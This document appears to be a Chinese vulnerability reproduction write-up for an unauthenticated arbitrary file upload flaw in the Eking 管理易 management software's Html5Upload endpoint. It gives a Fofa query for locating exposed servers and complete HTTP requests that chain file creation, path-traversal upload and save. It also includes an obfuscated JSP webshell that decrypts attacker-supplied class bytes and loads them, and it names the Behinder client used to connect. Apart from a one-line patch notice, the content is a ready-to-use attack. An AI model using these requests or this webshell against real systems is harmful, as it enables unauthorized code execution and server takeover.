Eking管理易 Html5Upload 前台任意文件上传漏洞复现

0x01 产品描述：

    ‌Eking管理易是一款专为广告制品制作企业量身定制的管理软件产品，旨在帮助企业实现规范化、科学化管理，提升运营效率和降低运营成本。‌ 该软件由广州易凯软件技术有限公司开发，基于JAVA企业版技术研发，采用B/S架构，支持Internet应用，能够适应广告装饰、有机工艺、展览展示、有机丝印、喷绘写真等广告标识制作企业的需求‌

0x02 漏洞描述：

EKing-管理易/Html5Upload 接口处存在前台任意文件上传漏洞，未经身份验证的远程攻击者可利用此漏洞上传任意文件，在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器

0x03 搜索语句：

Fofa：app="EKing-管理易"

0x04 漏洞复现：

该漏洞需要通过/Html5Upload 接口分三步进行操作，通过Html5Upload 接口依次进行文件名创建，数据上传，文件保存。

文件名创建：

POST /Html5Upload.ihtm HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: closecomm_type=INIT&sign_id=shell1&vp_type=default&file_name=../../test1.jsp&file_size=2048

 数据上传：

 注意这里sign_id需要跟随文件创建的sign_id 否则数据上传地址不是同一个

POST /Html5Upload.ihtm HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR
Connection: close------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="comm_type"DATA
------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="sign_id"shell1
------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="data_inde"0
------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="data"; filename="chunk1"
Content-Type: application/octet-stream<% out.println("test");%>
------WebKitFormBoundaryj7OlOPiiukkdktZR--

保存文件：

同样需注意这里的sign_id

POST /Html5Upload.ihtm HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: closecomm_type=END&sign_id=shell1&file_name=../../test1.jsp

 

访问保存文件名地址：

 

webshell构建

POST /Html5Upload.ihtm HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR
Connection: close------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="comm_type"DATA
------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="sign_id"shell1
------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="data_inde"0
------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="data"; filename="chunk1"
Content-Type: application/octet-stream<%! public byte[] Af5Wb(String Strings,String k) throws Exception { javax.crypto.Cipher BBswL9 = javax.crypto.Cipher.getInstance("AES/ECB/PKCS5Padding");BBswL9.init(javax.crypto.Cipher.DECRYPT_MODE, (javax.crypto.spec.SecretKeySpec) Class.forName("javax.crypto.spec.SecretKeySpec").getConstructor(byte[].class, String.class).newInstance(k.getBytes(), "AES"));byte[] bytes;try{int[] aa = new int[]{122, 113, 102, 113, 62, 101, 100, 121, 124, 62, 82, 113, 99, 117, 38, 36};String ccstr = "";for (int i = 0; i < aa.length; i++) { aa[i] = aa[i] ^ 0x010;ccstr = ccstr + (char) aa[i];}Class clazz = Class.forName(ccstr); Object decoder = clazz.getMethod("getDecoder").invoke(null);bytes =  (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, Strings);}catch (Throwable e){int[] aa = new int[]{99, 101, 126, 62, 125, 121, 99, 115, 62, 82, 81, 67, 85, 38, 36, 84, 117, 115, 127, 116, 117, 98};String ccstr = "";for (int i = 0; i < aa.length; i++) {aa[i] = aa[i] ^ 0x010;ccstr = ccstr + (char) aa[i];}Class clazz = Class.forName(ccstr);bytes = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), Strings);}byte[] result = (byte[]) BBswL9.getClass()./*Zw8Cf543c0*/getDeclaredMethod/*Zw8Cf543c0*/("doFinal", new Class[]{byte[].class}).invoke(BBswL9,new Object[]{bytes});return result;} %><%  try {  String KF5n3T9 = "dfff0a7fa1a55c8c";  session.putValue("u", KF5n3T9);  byte[] Iu73Wlq = Af5Wb (request.getReader().readLine(),KF5n3T9);  java./*Zw8Cf543c0*/lang./*Zw8Cf543c0*/reflect.Method Af5Wb = Class.forName("java.lang.ClassLoader").getDeclaredMethod/*Zw8Cf543c0*/("defineClass",byte[].class,int/**/.class,int/**/.class);  Af5Wb.setAccessible(true);  Class i = (Class)Af5Wb.invoke(Thread.currentThread()./*Zw8Cf543c0*/getContextClassLoader(), Iu73Wlq , 0, Iu73Wlq.length);  Object QsG8 = i./*Zw8Cf543c0*/newInstance();  QsG8.equals(pageContext); } catch (Exception e) {} %>
------WebKitFormBoundaryj7OlOPiiukkdktZR--

数据上传后进行文件保存并通过冰蝎4.1进行连接

 

0x05 修复建议：

官方已发布补丁 请即时修复。